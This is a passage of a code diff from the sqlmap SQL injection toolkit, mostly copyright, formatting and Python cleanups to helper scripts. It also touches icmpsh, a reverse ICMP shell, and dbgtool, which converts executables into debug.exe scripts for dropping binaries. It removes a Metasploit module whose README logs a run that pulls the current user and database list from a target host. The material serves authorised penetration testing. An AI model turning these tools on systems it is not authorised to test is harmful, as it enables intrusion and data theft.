+        with open(inputFile, "rb") as f:
+            data = f.read()
 
-    return hideAscii(data)
+    return hideAscii(zlib.compress(data))
 
-def decloak(inputFile):
-    f = open(inputFile, 'rb')
-    data = bz2.decompress(hideAscii(f.read()))
-    f.close()
+def decloak(inputFile=None, data=None):
+    if data is None:
+        with open(inputFile, "rb") as f:
+            data = f.read()
+    try:
+        data = zlib.decompress(hideAscii(data))
+    except:
+        print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
+        sys.exit(1)
+    finally:
+        f.close()
 
     return data
 
 def main():
     usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
-    parser  = OptionParser(usage=usage, version='0.1')
+    parser = OptionParser(usage=usage, version='0.1')
 
     try:
         parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
@@ -58,7 +63,7 @@ def main():
         parser.error(e)
 
     if not os.path.isfile(args.inputFile):
-        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile
         sys.exit(1)
 
     if not args.decrypt:
@@ -72,10 +77,9 @@ def main():
         else:
             args.outputFile = args.inputFile[:-1]
 
-    fpOut      = open(args.outputFile, 'wb')
-    sys.stdout = fpOut
-    sys.stdout.write(data)
-    sys.stdout.close()
+    f = open(args.outputFile, 'wb')
+    f.write(data)
+    f.close()
 
 if __name__ == '__main__':
     main()

extra/dbgtool/__init__.py

@@ -1,9 +1,7 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

extra/dbgtool/dbgtool.py

@@ -1,11 +1,9 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
 dbgtool.py - Portable executable to ASCII debug script converter
 
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -24,13 +22,13 @@ def convert(inputFile):
         print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile
         sys.exit(1)
 
-    script     = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
-    script    += "%x\nf 0100 ffff 00\n" % fileSize
-    scrString  = ""
-    counter    = 256
-    counter2   = 0
+    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
+    script += "%x\nf 0100 ffff 00\n" % fileSize
+    scrString = ""
+    counter = 256
+    counter2 = 0
 
-    fp          = open(inputFile, "rb")
+    fp = open(inputFile, "rb")
     fileContent = fp.read()
 
     for fileChar in fileContent:
@@ -40,20 +38,20 @@ def convert(inputFile):
             counter2 += 1
 
             if not scrString:
-                scrString  = "e %0x %02x" % (counter, unsignedFileChar)
+                scrString = "e %0x %02x" % (counter, unsignedFileChar)
             else:
                 scrString += " %02x" % unsignedFileChar
         elif scrString:
-            script   += "%s\n" % scrString
+            script += "%s\n" % scrString
             scrString = ""
-            counter2  = 0
+            counter2 = 0
 
         counter += 1
 
         if counter2 == 20:
-            script    += "%s\n" % scrString
-            scrString  = ""
-            counter2   = 0
+            script += "%s\n" % scrString
+            scrString = ""
+            counter2 = 0
 
     script += "w\nq\n"
 
@@ -67,7 +65,7 @@ def main(inputFile, outputFile):
     script = convert(inputFile)
 
     if outputFile:
-        fpOut      = open(outputFile, "w")
+        fpOut = open(outputFile, "w")
         sys.stdout = fpOut
         sys.stdout.write(script)
         sys.stdout.close()
@@ -76,7 +74,7 @@ def main(inputFile, outputFile):
 
 if __name__ == "__main__":
     usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
-    parser  = OptionParser(usage=usage, version="0.1")
+    parser = OptionParser(usage=usage, version="0.1")
 
     try:
         parser.add_option("-i", dest="inputFile", help="Input binary file")
@@ -91,7 +89,7 @@ if __name__ == "__main__":
     except (OptionError, TypeError), e:
         parser.error(e)
 
-    inputFile  = args.inputFile
+    inputFile = args.inputFile
     outputFile = args.outputFile
 
     main(inputFile, outputFile)

extra/icmpsh/README.txt

@@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible
 The master is straight forward to use. There are no extra libraries required for the C version. 
 The Perl master however has the following dependencies:
 
-	* IO::Socket
-	* NetPacket::IP
-	* NetPacket::ICMP
+    * IO::Socket
+    * NetPacket::IP
+    * NetPacket::ICMP
 
 
 When running the master, don't forget to disable ICMP replies by the OS. For example:
 
-	sysctl -w net.ipv4.icmp_echo_ignore_all=1
+    sysctl -w net.ipv4.icmp_echo_ignore_all=1
 
 If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
 commands send from the master.
@@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below:
 -t host            host ip address to send ping requests to. This option is mandatory!
 
 -r                 send a single test icmp request containing the string "Test1234" and then quit. 
-		   This is for testing the connection.
+                   This is for testing the connection.
 
 -d milliseconds    delay between requests in milliseconds 
 
 -o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
-		   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
+                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                    The counter is set back to 0 if a response was received.
 
 -b num             limit of blanks (unanswered icmp requests before quitting

extra/icmpsh/icmpsh-s.c

@@ -99,7 +99,7 @@ void usage(char *path)
 	printf("  -h                 this screen\n");
 	printf("  -b num             maximal number of blanks (unanswered icmp requests)\n");
     printf("                     before quitting\n");
-	printf("  -s bytes           maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
+	printf("  -s bytes           maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
 	printf("In order to improve the speed, lower the delay (-d) between requests or\n");
     printf("increase the size (-s) of the data buffer\n");
 }
@@ -203,8 +203,6 @@ int main(int argc, char **argv)
 	PROCESS_INFORMATION pi;
 	int status;
 	unsigned int max_data_size;
-	struct hostent *he;
-
 
 	// set defaults
 	target = 0;

extra/icmpsh/icmpsh_m.py

@@ -57,7 +57,7 @@ def main(src, dst):
     # with the returned data
     try:
         sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
-    except socket.error, e:
+    except socket.error:
         sys.stderr.write('You need to run icmpsh master with administrator privileges\n')
         sys.exit(1)
 
@@ -76,7 +76,7 @@ def main(src, dst):
     # Instantiate an IP packets decoder
     decoder = ImpactDecoder.IPDecoder()
 
-    while 1:
+    while True:
         cmd = ''
 
         # Wait for incoming replies

extra/keepalive/keepalive.py

@@ -1,463 +0,0 @@
-#!/usr/bin/env python
-#
-# Copyright 2002-2003 Michael D. Stenner
-#
-# This program is free software: you can redistribute it and/or modify it
-# under the terms of the GNU Lesser General Public License as published
-# by the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU Lesser General Public License for more details.
-#
-# You should have received a copy of the GNU Lesser General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-#
-
-"""An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive.
-
-  import urllib2
-  from keepalive import HTTPHandler
-  keepalive_handler = HTTPHandler()
-  opener = urllib2.build_opener(keepalive_handler)
-  urllib2.install_opener(opener)
-
-  fo = urllib2.urlopen('http://www.python.org')
-
-To remove the handler, simply re-run build_opener with no arguments, and
-install that opener.
-
-You can explicitly close connections by using the close_connection()
-method of the returned file-like object (described below) or you can
-use the handler methods:
-
-  close_connection(host)
-  close_all()
-  open_connections()
-
-Example:
-
-  keepalive_handler.close_all()
-
-EXTRA ATTRIBUTES AND METHODS
-
-  Upon a status of 200, the object returned has a few additional
-  attributes and methods, which should not be used if you want to
-  remain consistent with the normal urllib2-returned objects:
-
-    close_connection()  -  close the connection to the host
-    readlines()         -  you know, readlines()
-    status              -  the return status (ie 404)
-    reason              -  english translation of status (ie 'File not found')
-
-  If you want the best of both worlds, use this inside an
-  AttributeError-catching try:
-
-    try: status = fo.status
-    except AttributeError: status = None
-
-  Unfortunately, these are ONLY there if status == 200, so it's not
-  easy to distinguish between non-200 responses.  The reason is that
-  urllib2 tries to do clever things with error codes 301, 302, 401,
-  and 407, and it wraps the object upon return.
-
-  You can optionally set the module-level global HANDLE_ERRORS to 0,
-  in which case the handler will always return the object directly.
-  If you like the fancy handling of errors, don't do this.  If you
-  prefer to see your error codes, then do.
-
-"""
-from httplib import _CS_REQ_STARTED, _CS_REQ_SENT, _CS_IDLE, CannotSendHeader
-
-from lib.core.common import encodeUnicode
-from lib.core.data import kb
-
-import threading
-import urllib2
-import httplib
-import socket
-
-VERSION = (0, 1)
-#STRING_VERSION = '.'.join(map(str, VERSION))
-DEBUG = 0
-HANDLE_ERRORS = 1
-
-class HTTPHandler(urllib2.HTTPHandler):
-    def __init__(self):
-        self._connections = {}
-
-    def close_connection(self, host):
-        """close connection to <host>
-        host is the host:port spec, as in 'www.cnn.com:8080' as passed in.
-        no error occurs if there is no connection to that host."""
-        self._remove_connection(host, close=1)
-
-    def open_connections(self):
-        """return a list of connected hosts"""
-        retVal = []
-        currentThread = threading.currentThread()
-        for name, host in self._connections.keys():
-            if name == currentThread.getName():
-                retVal.append(host)
-        return retVal
-
-    def close_all(self):
-        """close all open connections"""
-        for _, conn in self._connections.items():
-            conn.close()
-        self._connections = {}
-
-    def _remove_connection(self, host, close=0):
-        key = self._get_connection_key(host)
-        if self._connections.has_key(key):
-            if close: self._connections[key].close()
-            del self._connections[key]
-
-    def _get_connection_key(self, host):
-        return (threading.currentThread().getName(), host)
-
-    def _start_connection(self, h, req):
-        h.clearheaders()
-        try:
-            if req.has_data():
-                data = req.get_data()
-                h.putrequest('POST', req.get_selector())
-                if not req.headers.has_key('Content-type'):
-                    req.headers['Content-type'] = 'application/x-www-form-urlencoded'
-                if not req.headers.has_key('Content-length'):
-                    req.headers['Content-length'] = '%d' % len(data)
-            else:
-                h.putrequest('GET', req.get_selector())
-
-            if not req.headers.has_key('Connection'):
-                req.headers['Connection'] = 'keep-alive'
-
-            for args in self.parent.addheaders:
-                h.putheader(*args)
-            for k, v in req.headers.items():
-                h.putheader(k, v)
-            h.endheaders()
-            if req.has_data():
-                h.send(data)
-        except socket.error, err:
-            h.close()
-            raise urllib2.URLError(err)
-
-    def do_open(self, http_class, req):
-        h = None
-        host = req.get_host()
-        if not host:
-            raise urllib2.URLError('no host given')
-
-        try:
-            need_new_connection = 1
-            key = self._get_connection_key(host)
-            h = self._connections.get(key)
-            if not h is None:
-                try:
-                    self._start_connection(h, req)
-                except:
-                    r = None
-                else:
-                    try: r = h.getresponse()
-                    except httplib.ResponseNotReady, e: r = None
-                    except httplib.BadStatusLine, e: r = None
-
-                if r is None or r.version == 9:
-                    # httplib falls back to assuming HTTP 0.9 if it gets a
-                    # bad header back.  This is most likely to happen if
-                    # the socket has been closed by the server since we
-                    # last used the connection.
-                    if DEBUG: print "failed to re-use connection to %s" % host
-                    h.close()
-                else:
-                    if DEBUG: print "re-using connection to %s" % host
-                    need_new_connection = 0
-            if need_new_connection:
-                if DEBUG: print "creating new connection to %s" % host
-                h = http_class(host)
-                self._connections[key] = h
-                self._start_connection(h, req)
-                r = h.getresponse()
-        except socket.error, err:
-            if h: h.close()
-            raise urllib2.URLError(err)
-
-        # if not a persistent connection, don't try to reuse it
-        if r.will_close: self._remove_connection(host)
-
-        if DEBUG:
-            print "STATUS: %s, %s" % (r.status, r.reason)
-        r._handler = self
-        r._host = host
-        r._url = req.get_full_url()
-
-        #if r.status == 200 or not HANDLE_ERRORS:
-            #return r
-        if r.status == 200 or not HANDLE_ERRORS:
-            # [speedplane] Must return an adinfourl object
-            resp = urllib2.addinfourl(r, r.msg, req.get_full_url())
-            resp.code = r.status
-            resp.msg = r.reason
-            return resp;
-        else:
-            return self.parent.error('http', req, r, r.status, r.reason, r.msg)
-
-    def http_open(self, req):
-        return self.do_open(HTTPConnection, req)
-
-class HTTPResponse(httplib.HTTPResponse):
-
-    # we need to subclass HTTPResponse in order to
-    # 1) add readline() and readlines() methods
-    # 2) add close_connection() methods
-    # 3) add info() and geturl() methods
-
-    # in order to add readline(), read must be modified to deal with a
-    # buffer.  example: readline must read a buffer and then spit back
-    # one line at a time.  The only real alternative is to read one
-    # BYTE at a time (ick).  Once something has been read, it can't be
-    # put back (ok, maybe it can, but that's even uglier than this),
-    # so if you THEN do a normal read, you must first take stuff from
-    # the buffer.
-
-    # the read method wraps the original to accomodate buffering,
-    # although read() never adds to the buffer.
-    # Both readline and readlines have been stolen with almost no
-    # modification from socket.py
-
-
-    def __init__(self, sock, debuglevel=0, strict=0, method=None):
-        if method: # the httplib in python 2.3 uses the method arg
-            httplib.HTTPResponse.__init__(self, sock, debuglevel, method)
-        else: # 2.2 doesn't
-            httplib.HTTPResponse.__init__(self, sock, debuglevel)
-        self.fileno = sock.fileno
-        self._rbuf = ''
-        self._rbufsize = 8096
-        self._handler = None # inserted by the handler later
-        self._host = None    # (same)
-        self._url = None     # (same)
-
-    _raw_read = httplib.HTTPResponse.read
-
-    def close_connection(self):
-        self.close()
-        self._handler._remove_connection(self._host, close=1)
-
-    def info(self):
-        return self.msg
-
-    def geturl(self):
-        return self._url
-
-    def read(self, amt=None):
-        # the _rbuf test is only in this first if for speed.  It's not
-        # logically necessary
-        if self._rbuf and not amt is None:
-            L = len(self._rbuf)
-            if amt > L:
-                amt -= L
-            else:
-                s = self._rbuf[:amt]
-                self._rbuf = self._rbuf[amt:]
-                return s
-
-        s = self._rbuf + self._raw_read(amt)
-        self._rbuf = ''
-        return s
-
-    def readline(self, limit=-1):
-        data = ""
-        i = self._rbuf.find('\n')
-        while i < 0 and not (0 < limit <= len(self._rbuf)):
-            new = self._raw_read(self._rbufsize)
-            if not new: break
-            i = new.find('\n')
-            if i >= 0: i = i + len(self._rbuf)
-            self._rbuf = self._rbuf + new
-        if i < 0: i = len(self._rbuf)
-        else: i = i+1
-        if 0 <= limit < len(self._rbuf): i = limit
-        data, self._rbuf = self._rbuf[:i], self._rbuf[i:]
-        return data
-
-    def readlines(self, sizehint = 0):
-        total = 0
-        list = []
-        while 1:
-            line = self.readline()
-            if not line: break
-            list.append(line)
-            total += len(line)
-            if sizehint and total >= sizehint:
-                break
-        return list
-
-
-class HTTPConnection(httplib.HTTPConnection):
-    # use the modified response class
-    response_class = HTTPResponse
-    _headers = None
-
-    def clearheaders(self):
-        self._headers = {}
-
-    def putheader(self, header, value):
-        """Send a request header line to the server.
-
-        For example: h.putheader('Accept', 'text/html')
-        """
-        if self.__state != _CS_REQ_STARTED:
-            raise CannotSendHeader()
-
-        self._headers[header] = value
-
-    def endheaders(self):
-        """Indicate that the last header line has been sent to the server."""
-
-        if self.__state == _CS_REQ_STARTED:
-            self.__state = _CS_REQ_SENT
-        else:
-            raise CannotSendHeader()
-
-        for header in ['Host', 'Accept-Encoding']:
-            if header in self._headers:
-                str = '%s: %s' % (header, self._headers[header])
-                self._output(str)
-                del self._headers[header]
-
-        for header, value in self._headers.items():
-            str = '%s: %s' % (header, value)
-            self._output(str)
-
-        self._send_output()
-
-    def send(self, str):
-        httplib.HTTPConnection.send(self, encodeUnicode(str, kb.pageEncoding))
-
-#########################################################################
-#####   TEST FUNCTIONS
-#########################################################################
-
-def error_handler(url):
-    global HANDLE_ERRORS
-    orig = HANDLE_ERRORS
-    keepalive_handler = HTTPHandler()
-    opener = urllib2.build_opener(keepalive_handler)
-    urllib2.install_opener(opener)
-    pos = {0: 'off', 1: 'on'}
-    for i in (0, 1):
-        print "  fancy error handling %s (HANDLE_ERRORS = %i)" % (pos[i], i)
-        HANDLE_ERRORS = i
-        try:
-            fo = urllib2.urlopen(url)
-            foo = fo.read()
-            fo.close()
-            try: status, reason = fo.status, fo.reason
-            except AttributeError: status, reason = None, None
-        except IOError, e:
-            print "  EXCEPTION: %s" % e
-            raise
-        else:
-            print "  status = %s, reason = %s" % (status, reason)
-    HANDLE_ERRORS = orig
-    hosts = keepalive_handler.open_connections()
-    print "open connections:", ' '.join(hosts)
-    keepalive_handler.close_all()
-
-def continuity(url):
-    import md5
-    format = '%25s: %s'
-
-    # first fetch the file with the normal http handler
-    opener = urllib2.build_opener()
-    urllib2.install_opener(opener)
-    fo = urllib2.urlopen(url)
-    foo = fo.read()
-    fo.close()
-    m = md5.new(foo)
-    print format % ('normal urllib', m.hexdigest())
-
-    # now install the keepalive handler and try again
-    opener = urllib2.build_opener(HTTPHandler())
-    urllib2.install_opener(opener)
-
-    fo = urllib2.urlopen(url)
-    foo = fo.read()
-    fo.close()
-    m = md5.new(foo)
-    print format % ('keepalive read', m.hexdigest())
-
-    fo = urllib2.urlopen(url)
-    foo = ''
-    while 1:
-        f = fo.readline()
-        if f: foo = foo + f
-        else: break
-    fo.close()
-    m = md5.new(foo)
-    print format % ('keepalive readline', m.hexdigest())
-
-def comp(N, url):
-    print '  making %i connections to:\n  %s' % (N, url)
-
-    sys.stdout.write('  first using the normal urllib handlers')
-    # first use normal opener
-    opener = urllib2.build_opener()
-    urllib2.install_opener(opener)
-    t1 = fetch(N, url)
-    print '  TIME: %.3f s' % t1
-
-    sys.stdout.write('  now using the keepalive handler       ')
-    # now install the keepalive handler and try again
-    opener = urllib2.build_opener(HTTPHandler())
-    urllib2.install_opener(opener)
-    t2 = fetch(N, url)
-    print '  TIME: %.3f s' % t2
-    print '  improvement factor: %.2f' % (t1/t2, )
-
-def fetch(N, url, delay=0):
-    lens = []
-    starttime = time.time()
-    for i in range(N):
-        if delay and i > 0: time.sleep(delay)
-        fo = urllib2.urlopen(url)
-        foo = fo.read()
-        fo.close()
-        lens.append(len(foo))
-    diff = time.time() - starttime
-
-    j = 0
-    for i in lens[1:]:
-        j = j + 1
-        if not i == lens[0]:
-            print "WARNING: inconsistent length on read %i: %i" % (j, i)
-
-    return diff
-
-def test(url, N=10):
-    print "checking error hander (do this on a non-200)"
-    try: error_handler(url)
-    except IOError, e:
-        print "exiting - exception will prevent further tests"
-        sys.exit()
-    print
-    print "performing continuity test (making sure stuff isn't corrupted)"
-    continuity(url)
-    print
-    print "performing speed comparison"
-    comp(N, url)
-
-if __name__ == '__main__':
-    import time
-    import sys
-    try:
-        N = int(sys.argv[1])
-        url = sys.argv[2]
-    except:
-        print "%s <integer> <url>" % sys.argv[0]
-    else:
-        test(url, N)

extra/magic/__init__.py

@@ -1,3 +0,0 @@
-#!/usr/bin/env python
-
-pass

extra/msfauxmod/README.txt

@@ -1,78 +0,0 @@
-To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
-the example below.
-
-Note that if you are willing to run Metasploit's sqlmap auxiliary module on
-through WMAP framework you first need to install sqlmap on your system or
-add its file system path to the PATH environment variable.
-
-
-$ ./msfconsole
-
-                _                  _       _ _
-               | |                | |     (_) |
- _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
-| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
-| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
-|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
-                            | |
-                            |_|
-
-
-       =[ msf v3.2-testing
-+ -- --=[ 308 exploits - 173 payloads
-+ -- --=[ 20 encoders - 6 nops
-       =[ 75 aux
-
-msf > use auxiliary/scanner/http/wmap_sqlmap 
-msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
-RHOSTS => 192.168.1.121
-msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
-PATH => /sqlmap/mysql/get_int.php
-msf auxiliary(wmap_sqlmap) > set QUERY id=1
-QUERY => id=1
-msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
-OPTS => --dbs --current-user
-msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
-msf auxiliary(wmap_sqlmap) > show options 
-
-Module options:
-
-   Name         Current Setting                                                 Required  Description                                          
-   ----         ---------------                                                 --------  -----------                                          
-   BATCH        true                                                            yes       Never ask for user input, use the default behaviour  
-   BODY                                                                         no        The data string to be sent through POST              
-   METHOD       GET                                                             yes       HTTP Method                                          
-   OPTS         --dbs --current-user                                            no        The sqlmap options to use                            
-   PATH         /sqlmap/mysql/get_int.php                                       yes       The path/file to test for SQL injection              
-   Proxies                                                                      no        Use a proxy chain                                    
-   QUERY        id=1                                                            no        HTTP GET query                                       
-   RHOSTS       192.168.1.121                                                   yes       The target address range or CIDR identifier          
-   RPORT        80                                                              yes       The target port                                      
-   SQLMAP_PATH  /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py             yes       The sqlmap >= 0.6.1 full path                        
-   SSL          false                                                           no        Use SSL                                              
-   THREADS      1                                                               yes       The number of concurrent threads                     
-   VHOST                                                                        no        HTTP server virtual host                             
-
-msf auxiliary(wmap_sqlmap) > run
-[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
-SQLMAP: 
-SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
-SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
-SQLMAP: 
-SQLMAP: [*] starting at: 16:23:19
-SQLMAP: 
-SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-SQLMAP: back-end DBMS:  MySQL >= 5.0.0
-SQLMAP: 
-SQLMAP: current user:    'testuser@localhost'
-SQLMAP: 
-SQLMAP: available databases [3]:
-SQLMAP: [*] information_schema
-SQLMAP: [*] mysql
-SQLMAP: [*] test
-SQLMAP: 
-SQLMAP: 
-SQLMAP: [*] shutting down at: 16:23:21
-SQLMAP: 
-[*] Auxiliary module execution completed
-msf auxiliary(wmap_sqlmap) > 

extra/msfauxmod/sqlmap.rb

@@ -1,105 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Auxiliary::WMAPScanUniqueQuery
-	include Msf::Auxiliary::Scanner
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'			=> 'SQLMAP SQL Injection External Module',
-			'Description'	=> %q{
-					This module launch a sqlmap session.
-				sqlmap is an automatic SQL injection tool developed in Python.
-				Its goal is to detect and take advantage of SQL injection
-				vulnerabilities on web applications. Once it detects one
-				or more SQL injections on the target host, the user can
-				choose among a variety of options to perform an extensive
-				back-end database management system fingerprint, retrieve
-				DBMS session user and database, enumerate users, password
-				hashes, privileges, databases, dump entire or user
-				specific DBMS tables/columns, run his own SQL SELECT
-				statement, read specific files on the file system and much
-				more.
-			},
-			'Author'	    => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
-			'License'		=> BSD_LICENSE,
-			'Version'		=> '$Revision: 9212 $',
-			'References'	=>
-				[
-					['URL', 'http://sqlmap.sourceforge.net'],
-				]
-			))
-
-		register_options(
-			[
-				OptString.new('METHOD', [ true,  "HTTP Method", 'GET' ]),
-				OptString.new('PATH', [ true,  "The path/file to test for SQL injection", 'index.php' ]),
-				OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
-				OptString.new('DATA', [ false, "The data string to be sent through POST", '' ]),
-				OptString.new('OPTS', [ false,  "The sqlmap options to use", ' ' ]),
-				OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", '/sqlmap/sqlmap.py' ]),
-				OptBool.new('BATCH', [ true,  "Never ask for user input, use the default behaviour", true ])
-			], self.class)
-	end
-
-	# Modify to true if you have sqlmap installed.
-	def wmap_enabled
-		false
-	end
-
-	# Test a single host
-	def run_host(ip)
-
-		sqlmap = datastore['SQLMAP_PATH']
-
-		if not sqlmap
-			print_error("The sqlmap script could not be found")
-			return
-		end
-
-		data = datastore['DATA']
-		method = datastore['METHOD'].upcase
-
-		sqlmap_url  = (datastore['SSL'] ? "https" : "http")
-		sqlmap_url += "://" + wmap_target_host + ":" + wmap_target_port
-		sqlmap_url += "/" + datastore['PATH']
-
-		if method == "GET"
-			sqlmap_url += '?' + datastore['QUERY']
-		end
-
-		cmd  = sqlmap + ' -u \'' + sqlmap_url + '\''
-		cmd += ' --method ' + method
-		cmd += ' ' + datastore['OPTS']
-
-		if not data.empty?
-			cmd += ' --data \'' + data + '\''
-		end
-
-		if datastore['BATCH'] == true
-			cmd += ' --batch'
-		end
-
-		print_status("exec: #{cmd}")
-		IO.popen( cmd ) do |io|
-			io.each_line do |line|
-				print_line("SQLMAP: " + line.strip)
-			end
-		end
-	end
-
-end
-

extra/mssqlsig/update.py

@@ -1,17 +1,13 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import codecs
-import difflib
 import os
 import re
-import sys
 import urllib2
 import urlparse
 
@@ -25,7 +21,7 @@ MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/t
 
 def updateMSSQLXML():
     if not os.path.exists(MSSQL_XML):
-        errMsg = "[ERROR] file '%s' does not exist. please run the script from it's parent directory." % MSSQL_XML
+        errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML
         print errMsg
         return
 
@@ -38,16 +34,16 @@ def updateMSSQLXML():
         mssqlVersionsHtmlString = f.read()
         f.close()
     except urllib2.URLError:
-        __mssqlPath     = urlparse.urlsplit(MSSQL_VERSIONS_URL)
+        __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL)
         __mssqlHostname = __mssqlPath[1]
 
-        warnMsg  = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
+        warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
         warnMsg += " check your Internet connection and retry"
         print warnMsg
 
         return
 
-    releases      = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server ([\d\.]+) Builds", mssqlVersionsHtmlString, re.I | re.M)
+    releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
     releasesCount = len(releases)
 
     # Create the minidom document
@@ -57,7 +53,7 @@ def updateMSSQLXML():
     root = doc.createElement("root")
     doc.appendChild(root)
 
-    for index in range(0, releasesCount):
+    for index in xrange(0, releasesCount):
         release = releases[index]
 
         # Skip Microsoft SQL Server 6.5 because the HTML
@@ -73,12 +69,12 @@ def updateMSSQLXML():
         startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index])
 
         if index == releasesCount - 1:
-            stopIdx  = len(mssqlVersionsHtmlString)
+            stopIdx = len(mssqlVersionsHtmlString)
         else:
-            stopIdx  = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
+            stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
 
         mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
-        servicepackVersion = re.findall("</td><td>[7\.0|2000|2005|2008]*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I | re.M)
+        servicepackVersion = re.findall("</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
 
         for servicePack, version in servicepackVersion:
             if servicePack.startswith(" "):
@@ -97,6 +93,7 @@ def updateMSSQLXML():
             servicePack = servicePack.replace("\t", " ")
             servicePack = servicePack.replace("No SP", "0")
             servicePack = servicePack.replace("RTM", "0")
+            servicePack = servicePack.replace("TM", "0")
             servicePack = servicePack.replace("SP", "")
             servicePack = servicePack.replace("Service Pack", "")
             servicePack = servicePack.replace("<a href=\"http:", "")
@@ -133,7 +130,7 @@ def updateMSSQLXML():
     doc.writexml(writer=mssqlXml, addindent="    ", newl="\n")
     mssqlXml.close()
 
-    infoMsg  = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
+    infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
     print infoMsg
 
 if __name__ == "__main__":

extra/multipart/__init__.py

@@ -1,3 +0,0 @@
-#!/usr/bin/env python
-
-pass

extra/pagerank/__init__.py

@@ -1,26 +0,0 @@
-#!/usr/bin/env python
-#
-# The MIT License
-#
-# Copyright 2010 Corey Goldberg
-#
-# Permission is hereby granted, free of charge, to any person obtaining a copy
-# of this software and associated documentation files (the "Software"), to deal
-# in the Software without restriction, including without limitation the rights
-# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-# copies of the Software, and to permit persons to whom the Software is
-# furnished to do so, subject to the following conditions:
-#
-# The above copyright notice and this permission notice shall be included in
-# all copies or substantial portions of the Software.
-#
-# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
